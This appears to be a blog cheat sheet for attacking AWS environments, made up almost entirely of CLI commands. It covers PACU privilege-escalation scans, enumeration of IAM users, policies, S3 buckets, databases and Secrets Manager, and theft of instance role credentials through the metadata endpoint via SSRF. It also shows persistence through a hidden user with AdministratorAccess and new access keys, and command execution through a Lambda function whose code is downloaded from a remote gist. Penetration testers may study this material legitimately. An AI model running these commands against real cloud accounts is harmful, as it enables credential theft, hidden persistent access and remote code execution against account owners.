Installation and Basic Commands
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
sudo ./aws/install
#Login - Enter Client ID and Client_Secret
aws configure
#Login - Create a profile incase you have multiple accounts
aws configure --profile Some_NAME
#Get info about Access_key
aws sts get-caller-identity --profile Some_NAME
#Using Short Term Temp Creds
aws configure set aws_access_key_id [key-id] --profile ec2
aws configure set aws_secret_access_key [key-id] --profile ec2
aws configure set aws_session_token [token] --profile ec2
aws sts get-caller-identity --profile ec2
Exploitation using PACU
#Download and Install PACU
pip3 install -U pacu
#run pacu and create a session
pacu
0
AWS-Pentest
#Create AWS login Session - enter Access & Secret Key
set_keys
#Enum IAM permissions
exec iam__enum_permissions
#List all permission for the logged in user
whoami
#Enum EC2 Instances
exec ec2__enum
#List all the gathered data
data EC2
#Auto PrivEsc
exec iam__privesc_scan
Saved Credential Location
#Windows - filename: credentials
c:\Users\Name\.aws/credentials
#Linux - filename: credentials
/home/username/.aws/credentials
Important Things to Note
- If Access Key starts with AKI, it's a long-term credential
- if Account Number is present in a policy, its Inline, Customer Created Policy
Enumeration - Users
#List Users
aws iam list-users
#check if a given user is part of any groups
aws iam list-groups-for-user --user-name UserNameHere
#List AWS Managed Policies for a user
aws iam list-attached-user-policies --user-name UserNameHere
#List Inline Admin Created Policies for a user
aws iam list-user-policies --user-name UserNameHere
Enumeration - Groups & Policies
#List all Groups
aws iam list-groups
#List all users in a given group
aws iam get-group --group-name GroupNameHere
#List all manages policies that are attached to the specified IAM user
aws iam list-attached-user-policies --user-name [user-name]
#Lists the names of the inline policies embedded in the specified IAM user :
aws iam list-user-policies --user-name [user-name]
#List All IAM Roles - Roles can only attached only to a AWS compute resource
aws iam list-roles
#Lists all managed policies that are attached to the specified IAM role
aws iam list-attached-role-policies --role-name [ role-name]
#List the names of the inline policies embedded in the specified IAM role
aws iam list-role-policies --role-name [ role-name]
#List all Policies -Both inline and Managed Policies
aws iam list-policies
#List Policies attached to a group
aws iam list-attached-group-policies --group-name <group-name>
#Retrieves information about the specified managed policy
#AttachmentCount = Number of Entities this policy is used in
aws iam get-policy --policy-arn [policy-arn]
#Lists information about the versions of the specified manages policy
aws iam list-policy-versions --policy-arn [policy-arn]
#Retrieved information about the specified version of the specified managed policy
aws iam get-policy-version --policy-arn policy-arn --version-id [version-id]
#Retrieves the specified inline policy document that is embedded on the specified IAM user / group / role
aws iam get-user-policy --user-name [username] --policy-name [policy-name]
aws iam get-group-policy --group-name [group-name] --policy-name [policy-name]
aws iam get-role-policy --role-name [role-name] --policy-name [policy-name]
Simple Cheatsheet
#List your permissions - get ARN
aws sts get-caller-identity
#discover what else you can do, the IAM Policy Simulator is your best tool
aws iam simulate-principal-policy \
--policy-source-arn <arn-of-lambdazen-user> \
--action-names "ec2:DescribeInstances" "ec2:DescribeSubnets" "ec2:DescribeSecurityGroups"
#Check if you have any IAM permissions assigned to you
aws iam simulate-principal-policy \
--policy-source-arn <arn-of-lambdazen-user> \
--action-names "iam:ListUsers" "iam:ListRoles" "iam:GetPolicy"
#List user policies
aws iam list-user-policies --user-name UserNameHere
#Check for Inline Policies
aws iam get-user-policy --user-name lambdazen --policy-name <policy-name-from-previous-command>
#Check for Group Membership
aws iam list-groups-for-user --user-name lambdazen
#List the group's attached policies:
aws iam list-attached-group-policies --group-name <group-name>
#List the group's inline policies:
aws iam list-group-policies --group-name <group-name>
#Check for Resource-Based Policies
aws s3api get-bucket-policy --bucket <the-bucket-name-you-can-access>
Persistence
# Create the new user
aws iam create-user --user-name <new-hidden-user>
# Attach the same AdministratorAccess policy
aws iam attach-user-policy --user-name <new-hidden-user> --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# Create a new access key for your hidden user. Save this output securely.
aws iam create-access-key --user-name <new-hidden-user>
#AWS Console Access
aws iam create-login-profile --user-name <user-name> --password "YourSuperSecureP@ssw0rd!" --password-reset-required
Enumeration - Instances & Other Services
#List all EC2 Instances in default region
#Lists Keypair name, Public/Private IP
#Try to access the Public Endpoints - try to exploit them
#Check roles
aws ec2 describe-instances
#list only required details
aws ec2 describe-instances \
--filters "Name=instance-state-name,Values=running,stopped" \
--query "Reservations[*].Instances[*].{Name: (Tags[?Key=='Name'].Value | [0]), Hostname: PrivateDnsName, Status: State.Name, PrivateIP: PrivateIpAddress, PublicIP: PublicIpAddress}" \
--output table
#Example - retrieve EC2 Temp Creds if a Server is Public and is vuln to SSRF
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/jump-ec2-role
S3 Bucket
#OSINT Enum - Find S3 Buckets
cloud_enum -k Bucket_Company_Name
#list all buckets
aws s3 ls
#Download Unauthenticated S3 Bucket files
aws s3 ls s3://<bucket-name> --region us-east-2 --no-sign-request
aws s3 cp s3://<bucket-name> --region us-east-2 --no-sign-request
#List S3 Bucket Contents
aws s3 ls s3://Bucket_name
#Download a file from s3 bucket
aws s3 cp s3://Bucket_name/file/path /path/to/save/fil
#List the items in a given bucket excluding mp4 files
aws s3 ls s3://bucketname/ --recursive --summarize --exclude "*.mp4"
#Exclude a directory and list
aws s3 ls s3://bucketname/ --recursive --summarize \
--exclude "archived-logs/*" \
--exclude "temp-uploads/*" \
--exclude "user-avatars/*"
#Download a bucket recursively excluding a directory
aws s3 cp s3://bucketname/ . --recursive --exclude "archived-logs/*"
#Upload a file to s3 Bucket
aws s3 cp /path/to/upload/filename s3://Bucket_name/file/path
#Delte a file on S3 Bucket
aws s3 rm s3://Bucket_name/file/path
Cloudwatch
#Get S3 Bucket size/metrics using Cloud watch
aws cloudwatch get-metric-statistics \
--namespace AWS/S3 \
--metric-name BucketSizeBytes \
--dimensions Name=BucketName,Value=BucketNameHERE Name=StorageType,Value=StandardStorage \
--start-time $(date -u -d '2 days ago' +'%Y-%m-%dT%H:%M:%SZ') \
--end-time $(date -u +'%Y-%m-%dT%H:%M:%SZ') \
--period 86400 \
--statistics AverageDatabase Enumeration
#RDS
aws rds describe-db-instances
#DynamoDB
aws dynamodb list-tables
#Redshift Clusters
aws redshift describe-clusters
#DocumentDB Clusters
aws rds describe-db-clusters --filter Name=engine,Values=docdb
Secrets Manager & Key Vault
#List secrets
aws secretsmanager list-secrets
#List a specific Secret
aws secretsmanager get-secret-value --secret-id <secret-name-or-arn>
#List keys
aws kms list-keys
#List a given key
aws kms describe-key --key-id <key-id-or-alias-name>
#Check the Key Policy
aws kms get-key-policy --key-id <key-id> --policy-name default
Exploit if the User has Lambda Read/Write/Invoke Permissions
Action:
- 'Lambda:CreateFunction'
- 'Lambda:InvokeFunction'
#List existing functions
aws lambda list-functions
#get an existing function
aws lambda get-function --function-name <Func_Name>
#create a file named lambda_function.py
wget https://gist.githubusercontent.com/Bhanunamikaze/bf121677e9ffa3b1d8bd09e90426a283/raw/b11d4942dac11ef6d00374f4b2acd2ebeafc0355/lambda_function.py
#zip the file
zip function.zip lambda_function.py
#check if a given user is part of any groups
#take the rolename
aws iam list-groups-for-user --user-name UserNameHere
#Create a Lambda Function
#add --endpoint-url 'http://domain.local' if required
aws lambda create-function --function-name test3 \
--runtime python3.8 \
--role arn:aws:iam::000000000000:role/<RoleNameHere> \
--handler lambda_function.lambda_handler \
--zip-file fileb://function.zip
#Create a payload file - payload.json; update the command as required
{"cmd": "ls"}
#invoke the function
aws lambda invoke --function-name test3 --payload fileb://payload.json output.json && cat output.json
#output of the command execution is stored in output.json file
Comments
Post a Comment